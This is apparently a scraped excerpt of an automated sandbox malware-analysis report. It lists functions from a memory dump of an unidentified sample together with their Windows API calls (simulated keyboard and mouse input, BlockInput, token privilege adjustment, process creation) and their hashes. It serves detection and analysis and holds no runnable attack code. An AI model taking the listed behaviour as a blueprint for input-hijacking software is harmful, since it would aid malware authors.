Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: 732a1d82964fcf1bff92986a46bcc9360f1649f8537bd4b38ec5676a1585729d
Instruction ID: 2a2d75c17a1681e4fb13324f4a7ddb094393eb28ee9537904d9d56974fd4b4a8
Opcode Fuzzy Hash: 732a1d82964fcf1bff92986a46bcc9360f1649f8537bd4b38ec5676a1585729d
Instruction Fuzzy Hash: 6BF01D72410219FFEB049F95DC05DAE7BB9FF44351F14406AF901A2160D3B5AA51ABB0

Function 00D8D712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00D9C2E2,?,?,00000000,?), ref: 00D8D73F
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00D9C2E2,?,?,00000000,?), ref: 00D8D751

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 71e780db38ed2e31efa2d39ddbf63fd141e1e4b3d323ff8c877371b9cf18ba79
Instruction ID: 459658a551e45cdc576f0714ad015b97dbee1f0459a9e58bee59efd8b5774e15
Opcode Fuzzy Hash: 71e780db38ed2e31efa2d39ddbf63fd141e1e4b3d323ff8c877371b9cf18ba79
Instruction Fuzzy Hash: BBF0823510032EABDB11AFA4CC49FEA776EEF49361F008125B909D61C1D630D940CBB0

Function 00D84B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00D84B89
keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00D84B9C

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 03ac6feb7110dec53e12c9d511694c174714196d6ceb53000e0e040b56058efe
Instruction ID: ed2a68580e718c2180683ec1cde094b9a807a518a518febe36014fdff7340bb6
Opcode Fuzzy Hash: 03ac6feb7110dec53e12c9d511694c174714196d6ceb53000e0e040b56058efe
Instruction Fuzzy Hash: F7F0677080038EAFEB059FA4C805BBE7BB4AF04305F04841AF961A6291D379D6129FA0

Function 00D7B8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D7B9EC), ref: 00D7B8C5
CloseHandle.KERNEL32(?,?,00D7B9EC), ref: 00D7B8D7

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: c0d42080d3d00a961f2cef315b5dce9c0eee093f3cfb092a37bfac20f1411c89
Instruction ID: 149bf5949386af05e4af3acaf24b82ae89e6c1a1e21f6205d119fc78e2b7b283
Opcode Fuzzy Hash: c0d42080d3d00a961f2cef315b5dce9c0eee093f3cfb092a37bfac20f1411c89
Instruction Fuzzy Hash: 88E0BF71004712AFE7262B54EC05DB77BEAEF053117148569F455C1470D7619C90DB30

Function 00DAF594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00DAF59C
NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00DBF3AD,?,?,?,?), ref: 00DAF5C6

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: aa29def99d8aac3576f759e591db4d2320c1396d654b602dae03404d60fd7dae
Instruction ID: 8e6eb43ca3609c2ec4f2eedc2117c752592e5ff2beb378074adf304ced7a22a5
Opcode Fuzzy Hash: aa29def99d8aac3576f759e591db4d2320c1396d654b602dae03404d60fd7dae
Instruction Fuzzy Hash: ACE08C7014421ABBEB141F4ADC0AFB93B19EB01B50F108526F996C80E0D7B088A1D670

Function 00D68E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,00D4125D,00D67A43,00D40F35,?,?,00000001), ref: 00D68E41
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00D68E4A

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 62dc57c2a1d1f9b8e67eb89acf6a32a97d7a17f6d07ed92d44f3a9b17f9dc5c8
Instruction ID: 140e81ac03e2024f5f79a45c54b299fba8e467fa32733cb793b816ba9fb186eb
Opcode Fuzzy Hash: 62dc57c2a1d1f9b8e67eb89acf6a32a97d7a17f6d07ed92d44f3a9b17f9dc5c8
Instruction Fuzzy Hash: A7B09271044B4AABEA002BA1ED09F887F6AEB48A62F024020FA1D842608B6354508EA2

Function 00D7113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58399b9764c397c7780095e770183379f76ae4cf43470a0fe2bd342ebbd09702
Instruction ID: 05d61797acaef18600a286781d8e8e40d4c2cd8ad66bdb1614a9858a48a464a0
Opcode Fuzzy Hash: 58399b9764c397c7780095e770183379f76ae4cf43470a0fe2bd342ebbd09702
Instruction Fuzzy Hash: 48B10520D2AF514DD72396399831336B75CAFBB2C6F91D71BFC1AB4E26EB2185834180

Function 00DB02AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E

NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00DB0352

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 49c32c409aa83810758003787e470b6d7e062cdbd443223ebd76ba4889ba39be
Instruction ID: 074661ecdcd64f52c5b7843bfd52e8dec8fe410497db5f919dfbf0ec3b8fb4b7
Opcode Fuzzy Hash: 49c32c409aa83810758003787e470b6d7e062cdbd443223ebd76ba4889ba39be
Instruction Fuzzy Hash: F4113D31104215FFFB241B2CCC49FFA3E54D746720F248324F913592E2CA609E40D275

Function 00DAE769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00D5B155: GetWindowLongW.USER32(?,000000EB), ref: 00D5B166

CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00DAE7AF

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$CallLongProc
String ID:
API String ID: 4084987330-0
Opcode ID: 00ce8415e87a814039f44bf57dc6c10624d5a666e2352a114f1cc9e4d43c2034
Instruction ID: 7dad5c3bd9b0035b3b2ef873fee760bb97854610c9e2f113a730634b50c6a664
Opcode Fuzzy Hash: 00ce8415e87a814039f44bf57dc6c10624d5a666e2352a114f1cc9e4d43c2034
Instruction Fuzzy Hash: 1BF04F32100209FFCF099F94DC40C793BAAEB05320B048564FD559A6A1C732DD61EB70

Function 00DAEA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E

Part of subcall function 00D5B736: GetCursorPos.USER32(000000FF), ref: 00D5B749
Part of subcall function 00D5B736: ScreenToClient.USER32(00000000,000000FF), ref: 00D5B766
Part of subcall function 00D5B736: GetAsyncKeyState.USER32(00000001), ref: 00D5B78B
Part of subcall function 00D5B736: GetAsyncKeyState.USER32(00000002), ref: 00D5B799

NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00DBF417,?,?,?,?,?,00000001,?), ref: 00DAEA9C

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
String ID:
API String ID: 2356834413-0
Opcode ID: 1014a1afaa421d052c49446bbbf8df00ccafb65b3f1a836593f57d59310f3f68
Instruction ID: 4e6751a4c88d6f6f9124ab6aa8a12e9a11dfbbd1767a758e3bbe58b35a5a3ca9
Opcode Fuzzy Hash: 1014a1afaa421d052c49446bbbf8df00ccafb65b3f1a836593f57d59310f3f68
Instruction Fuzzy Hash: BFF08C71200229ABDF14AF19CC0AEBA3B65FB01791F048015FD062A2A1D776D9A5DBF1

Function 00D5B7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E

NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,00D5AF40,?,?,?,?,?), ref: 00D5B83B

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: c54a40e9b61acc4ec18ce95739fd5bfde69f6931ea2cee9bc7d95c328e9c8417
Instruction ID: 204e30cc4778139d79abb1baee1327825bba77353e99933e5be695ed9e46d44f
Opcode Fuzzy Hash: c54a40e9b61acc4ec18ce95739fd5bfde69f6931ea2cee9bc7d95c328e9c8417
Instruction Fuzzy Hash: 87F08230600209DFDF18DF19DC91A753BA6FB45361F148269FD524B2A0D772D994DB70

Function 00D9703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00D97057

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 33c1e1b60d956ea803e9427a8353a0beb60cb6fd0538242f42dbf23319d13871
Instruction ID: 91b3899a1cc16eaceb960ad085ebd38d9e9cb3e4891cebb8296fc125177264f0
Opcode Fuzzy Hash: 33c1e1b60d956ea803e9427a8353a0beb60cb6fd0538242f42dbf23319d13871
Instruction Fuzzy Hash: 72E048356142055FCB10DFA9D804D96F7EDDF94750F048426FE49D7351EAB0E8049BB0

Function 00DAF3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00DAF41A

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 3edb5aef825410003d976714d747fc1ae569e29925f590f57650125774bf365a
Instruction ID: f51402d55d1c853568ae2e0f0052d72d29246b93f7fa4a847b4ec04fd6eb7aad
Opcode Fuzzy Hash: 3edb5aef825410003d976714d747fc1ae569e29925f590f57650125774bf365a
Instruction Fuzzy Hash: 4BF06D31200389AFDB21DF58DC05FC63BA9FB0A360F048468BA116B2E1CB71A960DB74

Function 00D87DD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00D87DF8

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 5afa2b17dae2494d4f70671ae9f8c38a198d7d7f478a353dd68c3560c0b9b8e3
Instruction ID: 48199ecfbcdfd0bee34996c8d4fafaddad281cb18e8e88fdca5197bfd68387cd
Opcode Fuzzy Hash: 5afa2b17dae2494d4f70671ae9f8c38a198d7d7f478a353dd68c3560c0b9b8e3
Instruction Fuzzy Hash: 47D05EA217C206F9FD1827209C2FF3A2108EB01780FB94249B051C60C1EC94E8006638

Function 00D5AC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E

NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00D5ACC7

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 8dd6a4899392ad8b51ab3d3f589315e068a80dba21ebb82925f27e0b8f2994cb
Instruction ID: 7794310d5c19370af483c8b99c017e19a8eeef2c57113a62211065df4c053f46
Opcode Fuzzy Hash: 8dd6a4899392ad8b51ab3d3f589315e068a80dba21ebb82925f27e0b8f2994cb
Instruction Fuzzy Hash: 2CE0EC35100208FBCF09AF95DC52E643B2AFB49354F108458FA055E2A1CA33E566EB71

Function 00DAF425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00DBF3D4,?,?,?,?,?,?), ref: 00DAF450

Part of subcall function 00DAE13E: _memset.LIBCMT ref: 00DAE14D
Part of subcall function 00DAE13E: _memset.LIBCMT ref: 00DAE15C
Part of subcall function 00DAE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E03EE0,00E03F24), ref: 00DAE18B
Part of subcall function 00DAE13E: CloseHandle.KERNEL32 ref: 00DAE19D

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
String ID:
API String ID: 2364484715-0
Opcode ID: 00339cb97aa3af509155a7ab51886750b39d90c83f695e2f54857ab105206b36
Instruction ID: fdcf29675d8a512d5aeafe18f79d89c98bbd99d3c7ba944b5030a5276fea7dd1
Opcode Fuzzy Hash: 00339cb97aa3af509155a7ab51886750b39d90c83f695e2f54857ab105206b36
